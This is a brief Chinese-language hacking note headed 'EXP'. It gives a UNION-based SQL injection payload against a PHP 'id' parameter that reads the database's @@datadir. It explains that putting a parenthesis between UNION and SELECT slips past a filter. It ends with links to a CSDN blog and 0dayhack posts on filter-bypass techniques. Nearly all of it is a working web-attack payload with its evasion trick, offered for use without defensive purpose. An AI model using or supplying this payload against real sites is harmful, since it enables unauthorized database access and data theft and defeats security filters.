EXP:
1.php?id=-1 union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)
在union和select中间加个(就绕过了。
/***********************************************************************************/
某位大佬的bypass之道
http://blog.csdn.net/wjy397/article/details/53263281
https://www.0dayhack.com/post-778.html
https://www.0dayhack.com/post-779.html